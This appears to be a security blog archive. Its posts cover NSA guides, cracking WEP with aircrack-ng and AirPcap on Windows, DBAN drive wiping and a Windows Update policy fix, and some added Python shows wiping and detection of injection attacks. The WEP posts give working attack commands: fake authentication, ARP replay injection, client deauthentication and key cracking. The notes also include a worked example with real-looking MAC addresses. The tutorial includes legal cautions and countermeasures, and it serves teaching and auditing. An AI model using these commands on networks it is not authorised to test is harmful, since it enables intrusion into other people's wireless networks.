Archive for Security

Security Configuration Guides from the NSA

I just discovered that the NSA publish a fair amount of Security guides on their website. Looks like some very interesting content – not to mention free :)

Found via Network Geek (which I found via Ma.tt)


Notes: Cracking WEP on the Windows command line with Aircrack-ng and AirPcap Tx

ARP injection in Windows using AirPcap Tx

Finally, I’ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial, it’s just my notes. Thanky :)

Basics

Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00

Start attack:

aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00

Deauth (if we need ARPs):

aireplay-ng --deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00

Start cracking:

aircrack-ng -z mycapturefile.cap

Worked example:

airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap

Download

I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.

Download the release of aircrack-ng for AirPcap Tx


Securely Erasing Hard Drives

Every once in a while I need to securely wipe a hard drive before it’s sold on. To do this I use Darik’s Boot and Nuke. DBAN is a free, bootable application that allows you to securely erase a hard drive so that no one can recover any of the data that’s on it.

Why should you use DBAN?

If you’re selling your hard drive on eBay, or anywhere else, it’s vital that the data is completely erased as many buyers are scouring for personal data left on hard drives. A format using fdisk is not enough, as a standard format only marks the data as erased – it’s still there, it’s just been hidden from view; and by using readily available tools, it’s incredibly easy to un-hide that data and do whatever you want with it. Securely erasing data is especially important if your decommissioned hard drive has any sensitive data on it – and it’s safe to say that if you care about your privacy, or you’re running a business, most data is sensitive!

Using DBAN

You can boot DBAN from a CD/DVD or a USB drive. Once it’s booted, simply choose a wipe method and how many rounds of wiping you’d like to perform. From my research online, I’ve found that a PRNG (Pseudo-Random Number Generation) wipe, 8 times over, is the most secure for modern hard drives. Apparently the Gutmann (35 round) wipe isn’t as effective on modern drives.

Here are the basic steps you need:

  • Burn the .iso file to a CD (you can use something like ImgBurn)
  • Boot up DBAN, and hit Enter to run in Interactive Mode.
  • Press the M Key to choose the Method: Scroll down to PRNG and hit Space.
  • Press the R Key to choose the Rounds: For high security we need 8 rounds, so replace 1 with 8.
  • Hit F10 to start, and wait until done.

Securely Erasing a Hard Drive with DBAN
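To show why a standard format is not enough and what the PRNG rounds actually do, here is an added Python example (not part of the original post, and not DBAN’s code) that treats a small temporary file as a constructed disk image: a quick format clears only the table at the front, a PRNG wipe overwrites every byte with random data for the chosen number of rounds, and a raw byte scan stands in for a recovery tool.

```python
import os
import tempfile

TABLE_SIZE = 512          # first 512 bytes play the role of the allocation table
DISK_SIZE = 64 * 1024     # constructed "disk" of 64 KiB
MARKER = b"CONFIDENTIAL customer export 2007"   # constructed sensitive content

def make_disk_image() -> str:
    """Build the constructed image: a table marking blocks as in use,
    followed by data blocks, one of which holds the marker."""
    fd, path = tempfile.mkstemp(suffix=".img")
    with os.fdopen(fd, "wb") as f:
        f.write(b"TABLE:" + b"\x01" * (TABLE_SIZE - 6))
        f.write(b"\x00" * 4096 + MARKER)
        f.write(b"\x00" * (DISK_SIZE - TABLE_SIZE - 4096 - len(MARKER)))
    return path

def quick_format(path: str) -> None:
    """A standard (quick) format only rewrites the allocation table;
    every data block, marker included, is left exactly as it was."""
    with open(path, "r+b") as f:
        f.write(b"TABLE:" + b"\x00" * (TABLE_SIZE - 6))

def prng_wipe(path: str, rounds: int = 8) -> int:
    """Overwrite every byte with CSPRNG output `rounds` times (the PRNG
    method with 8 rounds from the steps above). flush + fsync after each
    pass so the pass reaches the medium rather than the page cache.
    Returns the total number of bytes written."""
    size = os.path.getsize(path)
    written = 0
    with open(path, "r+b") as f:
        for _ in range(rounds):
            f.seek(0)
            remaining = size
            while remaining:
                chunk = os.urandom(min(1 << 16, remaining))
                f.write(chunk)
                written += len(chunk)
                remaining -= len(chunk)
            f.flush()
            os.fsync(f.fileno())
    return written

def marker_recoverable(path: str) -> bool:
    """Stand-in for a recovery tool: scan the raw bytes, ignoring the table."""
    with open(path, "rb") as f:
        return MARKER in f.read()
```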


Network policy stops you from using Windows Update

After re-installing the OS on a Dell Powervault 715n, I remembered that out of the box, it won’t connect to Windows Update (which is of course really, really stupid for a Windows 2000 Server based NAS).

If you RDC into the box, and then try to connect to Windows Update, you’ll see a message like this:

Access Denied

Network policy settings prevent you from using Windows Update to download and install updates on your computer.

If you believe you have received this message in error, please check with your system administrator.

Solution

To get around this on the 715N, follow these instructions:

  1. Log in as Administrator
  2. Go Start > Run… > gpedit.msc
  3. In the Left pane: Open User Configuration, Administrative Templates, and then click Start Menu and Taskbar
  4. In the Right pane: Double-click on Disable and remove links to Windows Update
  5. Choose ‘Disable’ and click OK
  6. You can now get Windows Updates via the Start Menu
  7. Don’t forget to Enable Automatic Updates! (Control Panel > Automatic Updates)

For any other Operating System, have a look at the Microsoft KB article


Cracking WEP with aircrack-ptw in Windows with AirPcap and Cain

Every time you deploy a WEP Access Point, a fluffy kitty dies.

Primer

Recently a team of German cryptography researchers perfected methods to recover a WEP key faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a mere 85,000 packets to have a 95% chance of recovering the WEP key.

Rather than collecting weak IVs as the older attack does, the PTW method collects ARP requests and responses and uses them to attack the encryption. ARP requests can either be collected naturally or generated via packet injection. Until recently, packet injection was only possible in Linux. With the advent of the AirPcap USB adapter and some unsupported beta drivers, it’s possible to inject packets in Windows. Update: CACE have released AirPcap Tx, which features fully supported packet injection, for an added premium.

In this tutorial, I’ll guide you through the process of recovering a WEP key, via the PTW attack, in Windows. For this you’ll be using the AirPcap USB adapter, Cain, aircrack-ptw, and the aircrack-ng suite.

Legalities

It’s important to point out that these methods should only be applied with permission from the owner of the target AP. You should either be auditing, penetration testing, or demonstrating the weaknesses of WEP in a Test Lab environment. You should not be using these methods to get “Free internet”!

Preparation

You’ll need:

Now you’ll need to prepare the environment:

  • Install the beta drivers (or if you have AirPcap Tx, install the drivers from the CD-ROM)
  • Plug in the AirPcap
  • Install Cain
  • Extract aircrack-ng to c:\airpcap\
  • Extract aircrack-ptw to c:\airpcap\
  • Move aircrack-ptw.exe to the bin folder (this is no longer required – see my notes)
  • Optional: To make things easier, move the contents of the bin folder to c:\airpcap\. You’ll then be able to run aircrack-ptw.exe with just c:\airpcap\aircrack-ptw.exe mycapture.cap

Let’s get cracking

I added narration to the video this evening at 20:36. It’s my first attempt at narration, and a little noisy, but I’m sure things will improve as time goes on! :)


Youtube Video Link

Countermeasures

The primary countermeasure to this WEP attack is to stop using WEP and switch your Access Points to WPA encryption. As you’ve seen in this video, WEP is just too easy to crack. For further reading, Wikipedia has an excellent entry on WPA.

Access Points are so cheap now that, if your AP doesn’t support WPA via a firmware upgrade, you can easily afford a new one with full WPA or WPA2 support.

Notes

Note 1: After recording this tutorial, I’ve become aware that, as of version 0.9, aircrack-ng.exe natively supports the PTW attack by using the -z switch. For example: aircrack-ng.exe -z mycapturefile.cap. If you want to use this attack, download aircrack-ng from the authors, and replace aircrack-ng.exe in c:\airpcap with the new one.

Note 2: The whole process from starting capture to recovering the WEP key takes about 10 minutes.

Note 3: It is important that you get the Packet Injection drivers and the aircrack-ng release specifically for the AirPcap adapter, or this will not work.

Note 4: Just to summarise the steps in the video:

  1. Run Cain and passively scan for the target AP, making a note of the Channel number.
  2. Using the channel number, tell AirPcap to inject packets once it has collected an ARP request. (You can sometimes force an ARP by sending Deauth. To do that, right click on the client. Otherwise, repair the Wireless connection on the client connected to the AP)
  3. To use the PTW attack, you need to collect all packets. By running airodump-ng you can collect all the packets generated by Cain. The reason we use airodump-ng instead of Cain is that Cain only collects WEP IVs.
  4. Once you’ve collected enough packets, run aircrack-ptw against the capture file.
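Seen from the defender’s side, the injection traffic described in these steps and in the aircrack-ng/AirPcap notes earlier on this page has a recognisable shape: a short deauth burst, then one ARP request replayed hundreds of times a second. The Python below is an added example, not part of the original posts or of any tool named here; it runs two simple WIDS-style checks over a constructed frame log that reuses the BSSID and client MACs from the worked example above (the 68-byte frame size for a WEP-encrypted ARP request is an assumption).

```python
from collections import defaultdict

AP = "00:a0:c5:9d:d5:50"      # BSSID from the worked example above
CLIENT = "00:90:4b:eb:9b:36"  # associated client from the worked example above

def constructed_frames():
    """Constructed frame log (not a real capture): (time_s, kind, src, dst, length)."""
    frames = [(0.0, "data", CLIENT, AP, 120), (0.4, "data", AP, CLIENT, 1500),
              (0.9, "data", CLIENT, AP, 300)]
    # Three deauths within 20 ms, the shape `aireplay-ng --deauth 3` produces.
    frames += [(2.0 + i * 0.01, "deauth", AP, CLIENT, 26) for i in range(3)]
    # One captured ARP request replayed 400 times in a second; the size never
    # changes (68 bytes is assumed here for a WEP-encrypted ARP request).
    frames += [(3.0 + i / 400, "data", CLIENT, AP, 68) for i in range(400)]
    return frames

def detect_deauth_bursts(frames, window=1.0, threshold=3):
    """(sender, first_time) for senders with >= threshold deauths inside window s."""
    by_src = defaultdict(list)
    for t, kind, src, _dst, _len in frames:
        if kind == "deauth":
            by_src[src].append(t)
    alerts = []
    for src, times in sorted(by_src.items()):
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                alerts.append((src, times[i]))
                break
    return alerts

def detect_replay_floods(frames, window=1.0, threshold=100):
    """(src, dst, length) keys whose data frames of one exact size exceed
    threshold in a sliding window: replayed ARPs differ only in IV, so their
    on-air size is constant, while genuine traffic varies in length."""
    by_key = defaultdict(list)
    for t, kind, src, dst, length in frames:
        if kind == "data":
            by_key[(src, dst, length)].append(t)
    alerts = []
    for key, times in sorted(by_key.items()):
        times.sort()
        lo = 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts.append(key)
                break
    return alerts
```

Both checks are rate based, so on a real sensor the thresholds should be tuned against the normal deauth and ARP rates of the network being monitored.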
